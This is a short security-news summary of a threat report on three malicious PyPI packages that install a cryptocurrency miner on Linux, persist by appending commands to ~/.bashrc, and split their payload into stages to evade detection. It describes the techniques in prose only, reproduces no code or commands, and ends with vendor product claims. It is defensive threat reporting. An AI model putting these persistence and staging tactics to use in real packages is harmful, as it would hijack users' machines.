Affected platforms: LinuxAffected parties: Linux users that have these malicious packages installedImpact: Latency in device performanceSeverity level: High.
On December 5th, 2023, FortiGuard's AI-driven OSS malware detection system identified three intriguing PyPI packages.
These packages, upon initial use, deploy a CoinMiner executable on Linux devices.
These three harmful packages are named modularseven-1.0, driftme-1.0, and catme-1.0.
These packages all exhibit a common attack methodology, so we will use driftme-1.0 as an example to illustrate the stages of the attack.
This file outlines the cryptocurrency mining setting.
The most deceptive aspect is that the attacker ensures that all these modifications are appended to the ~/.bashrc file, ensuring the reactivation of this malicious activity whenever the user initiates a new Bash shell session.
The coinMiner ELF file, retrieved during this process, is not new to the security community.
Currently, a significant number of vendors on VT recognize the payload as malicious.
This tactic improves the odds of evading detection by security solutions by minimizing the code within the PyPI package.
This malware inserts the malicious commands into the ~/.bashrc file.
This strategy aids in the prolonged, stealthy exploitation of the user's device for the attacker's benefit.
A notable trend we observed from this particular set of packages is that malicious actors continuously refine their strategies to conceal and lengthen the exploitation process.
An essential tactic discussed in this blog involves breaking down the entire malicious workflow into smaller stages and releasing them incrementally.
For the security community, the ability to detect subtle malicious indicators becomes crucial.
This serves as a reminder of the critical importance of thoroughly scrutinizing code and packages sourced from unverified or suspicious origins and staying well-informed about potential threats.
FortiGuard AntiVirus detects the malicious files identified in this report as.
The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.
The FortiGuard Web Filtering Service detects and blocks the download URLs cited in this report as Malicious.
The FortiDevSec SCA scanner detects malicious packages, including those cited in this report, which may operate as dependencies in users' projects in test phases and prevents those dependencies from being introduced into users' products.
This Cyber News was published on feeds.fortinet.com. Publication date: Wed, 03 Jan 2024 16:43:05 +0000